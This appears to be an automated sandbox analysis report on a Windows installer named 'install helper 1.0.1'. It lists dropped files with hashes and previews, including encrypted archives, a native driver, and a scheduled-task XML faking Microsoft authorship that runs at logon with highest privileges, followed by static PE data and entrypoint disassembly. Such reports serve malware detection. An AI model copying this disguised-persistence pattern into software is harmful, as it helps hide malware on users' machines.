Preview:	7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7....!!.(.....Gc..........Dg....Z..#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.\|T.5..V...E\|...q.........].}bl...y.....;...q....-a..RP3..L~k....\|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

C:\Program Files (x86)\Windows NT\locale7.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	29730
Entropy (8bit):	7.994290657653607
Encrypted:	true
SSDEEP:	768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
MD5:	2C3E0D1FB580A8F0855355CC7D8D4F7A
SHA1:	177E4A0B7C4BC8ACE0F46127398808E669222515
SHA-256:	9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
SHA-512:	B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
Malicious:	false
Preview:	.@S....z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#\|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.\|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

C:\Program Files (x86)\Windows NT\locale7.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	29730
Entropy (8bit):	7.994290657653608
Encrypted:	true
SSDEEP:	768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
MD5:	A9C8A3E00692F79E1BA9693003F85D18
SHA1:	5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
SHA-256:	B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
SHA-512:	8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
Malicious:	false
Preview:	7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?......XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...\|Ynic......ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..\|..)f...C....$...E....H"x..F....wW...3"......Y.Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$.....&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

C:\Program Files (x86)\Windows NT\res.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	2603681
Entropy (8bit):	7.999925048660142
Encrypted:	true
SSDEEP:	49152:LTl/YfOFTVDpw1I8zwTR8K4jZ4O2WLHPyoSnxD14cI7jnyODI6MXpqg4fy:LFyd6RC4+OoGU7jyO7MXQg4fy
MD5:	58D8EBB349687B1D6069F6413C7E0391
SHA1:	4D235DCCE39C99DD182D660964CE1EBA66427B06
SHA-256:	5D181A626C632CFDAA81340AC6AC005EBA31A35BF69C7977D202E7F8F29D29AE
SHA-512:	D421B3365A60FA10681B55BFEE5AC3C390EE48BFA4ACA1FF853A468FF6E64BF25FD837D7D93139AD3FF43C25DA21EADE791C6FE0B18D762D9D7D1FC06C0635C8
Malicious:	false
Preview:	7z..'.......@.'.....A........q._t.....5oO./`..`.6C.+.......2y@.B....Ni@..l;.).Uc....w.....I4..CfW'.G.\|1.I?..]..>%Ue.(.DX..?...[..q8.I3.n.8.'Up..(......~R. c........U.3i.s....3]........c..............LO....Ax.P..S..6o.E....r.p.&c......p.d..`.......y3..0...m(.G$"hNfR...y.I..S.j..{O..d<._.^.X.....{..+.#.@....s.]t.Nx......WWlJ.......=%i7jS..&.S..R.....Z.A...Kdb...w.#o....N....\...@.wy...+..A...S..r?...w..[........:..a..W%.~}:....;..Y..lA.../(9x......e.2......4S..W.o..Z.'....&N..I..f..{.._j\|5.B.....W-..............O.-.x..T.Q.sS.5x.v.p....k]bMG!.+......;.....\!....9..S.Q.?).RM.....>. ..k.\,b.<,+.L...v.....p..J....c.....r......9..........S...........n...1~..6........r.x;.......g.g..b.Z@.."..+..u...P...oE...r.m....c.e.P...1...2.v......1\+-.../.I1..M..Y..K..~.%.......&e..(.....r....4PJ.i+.D..@..Q.%.(.....s.$..S...,.=.L.e..K...2.$.6..C....=BJ.O....q..O#...;....N.7e..(...,BJ..E.......6.h....u.Jg@.k..\|..$Qf.2.L...A.h.I]...[.... _o7ID.R...-. .)C.$..21...v...>..

C:\Program Files (x86)\Windows NT\tProtect.dll

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	63640
Entropy (8bit):	6.482810107683822
Encrypted:	false
SSDEEP:	768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
MD5:	B4EAACCE30F51EAF2A36CEA680B45A66
SHA1:	94493D7739C5EE7346DA31D9523404D62682B195
SHA-256:	15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
SHA-512:	16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.\|XN4.5N.\|HN6.5NA'XN6.5N.\|DN0.5N.\|IN6.5N.\|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\task.xml

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.3449406240731085
Encrypted:	false
SSDEEP:	48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
MD5:	1EA10B1FA76DC2F1967E53A3FC2D43C4
SHA1:	23EADA9D0994D5B9ADE7878493C44551C0B5CF44
SHA-256:	2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
SHA-512:	15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
Malicious:	false
Preview:	<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv

C:\Program Files (x86)\Windows NT\trash

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	2353553
Entropy (8bit):	7.99992611421159
Encrypted:	true
SSDEEP:	49152:rtfmdyArF7jC2uzD04c4vtHlkTmMVDfFv3ARw3ieIXzFj0nHfh:roDrBKxxlkq0fNAW3ieIXzuZ
MD5:	73616E6FB705D7163A2D8A391DDCAD6C
SHA1:	2ADEE96903C346D920E7B7B7527BE089F8388D87
SHA-256:	4AE1FF98AEC7817FF9E35A15118CFBD61CCF00C766ABE08C4EEFB58889EDF04E
SHA-512:	74D4726E6593783D062AFB2703C1B6465019C247DD2468B657AD95413BC4A3707F9D2695D9BE3CA51C9590A28C3ED22DDC52615F10F742A4432CD3A72A3A18FD
Malicious:	false
Preview:	....;.3......v.D.8.Wg..y.v.....u....Bwa...]`t...~..-..n.........9l..v.I}gwwT..7H.t?..6.G.x.-'7....]$...iq~....J`........$...(..m.z....,y..2C7.?...O...D.._..dP.&;....n .....a..l...#R......K.[&.eb.\&B..M..d .[.<.t\..W..,$........;@..........?.x..$+..Z...:.f....i.WL'..g .Xv1V....[f..._........+'.T.9..%...../v_)...G0........`(.J1+....U.l.9..2........Y..._K.....z.-......$..@E..c.J..c....B....h.;.5..2I7>....e.L...R..M.0"jz'.....g......:...A.?s...]C3?.%.....;.."..1........\Q...d+..Z...:-..M.Q.o.P...Y...`%O..I.f?.Kb...2./'].?Qq....+f..)..g["9.0.S..T+A...Z..v....Y...uR(.....3....&kD....D.+..v......Of,.D....Vz.9.9jZ.d...f...c..m.[Y....\|5.jV.....Oq...5.t\|.. N.P..~...a...5.......3.<++'...=..<.....l..!_.o9L.:..y..g.T.\...H.@....../t..<L.F.q1..B.!.9+\|.s}e4.jZbg_W..t..{.&xY.q.8.=M...8.O..x..._]6h%....g.....~.O..........$..p.~!.E[.!.+b.EH.......)..2.).KH.....(p...%u......!.t\+.....R. .$.ir...m.L+IC...OD....:26..y.j.x<L.?u.R.........x...........[.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulFuPh:NllUUP
MD5:	CC47C65E9D7FF52BEBF356F8F22FCCF9
SHA1:	25AC4580D6C84DB6F2675161368A5B89A48AB692
SHA-256:	CB1B97C689468D47FCDB7116ACBBEE0A8AC183F9C27517ABC376E57EC666C8D3
SHA-512:	882F88AF5A2C636C9949E24056105407E8C007643B49452EED7397B338AAC859B457F72901900A545B5474258CA15411158CEF34ABB512494C188843349AE601
Malicious:	false
Preview:	@...e.................................T.:............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jinjejp.ss3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ex0utvpt.ow1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hko5pinr.ebv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysfgwhqr.stk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Download File

Process:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.530564726182663
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	F0D4EEA505CEB561AB4AD622E3C0B9D5
SHA1:	70CB1C9B1E2A3B544A587225AB9D8AADB7B72395
SHA-256:	1881A519E644331856A6B867FC1827BB2AFF3D7D3046CB745E1A73934354C539
SHA-512:	0FAC2790242C0D65F541B0EBA14C411E505CC0C50166A289E478525C56FA845C6AF115E51993C3739358367DE3C47E1044A9CC4237F8149A8ABD637F30269058
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Download File

Process:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.530564726182663
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	F0D4EEA505CEB561AB4AD622E3C0B9D5
SHA1:	70CB1C9B1E2A3B544A587225AB9D8AADB7B72395
SHA-256:	1881A519E644331856A6B867FC1827BB2AFF3D7D3046CB745E1A73934354C539
SHA-512:	0FAC2790242C0D65F541B0EBA14C411E505CC0C50166A289E478525C56FA845C6AF115E51993C3739358367DE3C47E1044A9CC4237F8149A8ABD637F30269058
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-L8408.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-L8408.tmp\update.vac

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3606528
Entropy (8bit):	7.005604268954487
Encrypted:	false
SSDEEP:	98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
MD5:	1047AF726D2E233D71934EF55E635C4A
SHA1:	AB12E827E4E57DEA2E885733F0C48E9A83756678
SHA-256:	42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
SHA-512:	8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
Malicious:	false
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-SN9SA.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-SN9SA.tmp\update.vac

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3606528
Entropy (8bit):	7.005604268954487
Encrypted:	false
SSDEEP:	98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
MD5:	1047AF726D2E233D71934EF55E635C4A
SHA1:	AB12E827E4E57DEA2E885733F0C48E9A83756678
SHA-256:	42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
SHA-512:	8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
Malicious:	false
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	406
Entropy (8bit):	5.117520345541057
Encrypted:	false
SSDEEP:	6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
MD5:	9200058492BCA8F9D88B4877F842C148
SHA1:	EED69748A26CFAF769EF589F395A162E87005B36
SHA-256:	BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
SHA-512:	312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
Malicious:	false
Preview:	..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.95914765295349
TrID:	Win32 Executable (generic) a (10002005/4) 98.04% Inno Setup installer (109748/4) 1.08% InstallShield setup (43055/19) 0.42% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	#U5b89#U88c5#U52a9#U624b1.0.1.exe
File size:	8'595'621 bytes
MD5:	f2845d6410a0d9a090d414f3ae742e3b
SHA1:	a27e62687254f001c08b5313465d2ed1870f0eb5
SHA256:	f56c3d038c408355f6fb191865ca5650b29926f65b78d02b008b509bf640e588
SHA512:	48261d07b5f44f89414ceca11345413f97388e78a5d7f9dd56bf2a4520083150d9fe20ac11160274f457cfadb0b4bfea685135cb1f1ed2da288a488085a738c6
SSDEEP:	196608:lWLc3zOIl9n+GOdz13XOJqJfWovaeOTX8I0JGZI24j:lWLiqGn+B3X6O+ovEsIm
TLSH:	2E862213F2CBD43EE45E0B3B15B2A25454FB7A256826AE5386ECB4ECCF250501D3E64B
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007F25DDB7BA35h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007F25DDC0D3BBh
call 00007F25DDC0CF0Eh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F25DDC07BE8h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007F25DDB75AE3h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007F25DDC08F13h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F25DDC0D443h
mov dword ptr [004B4200h], eax
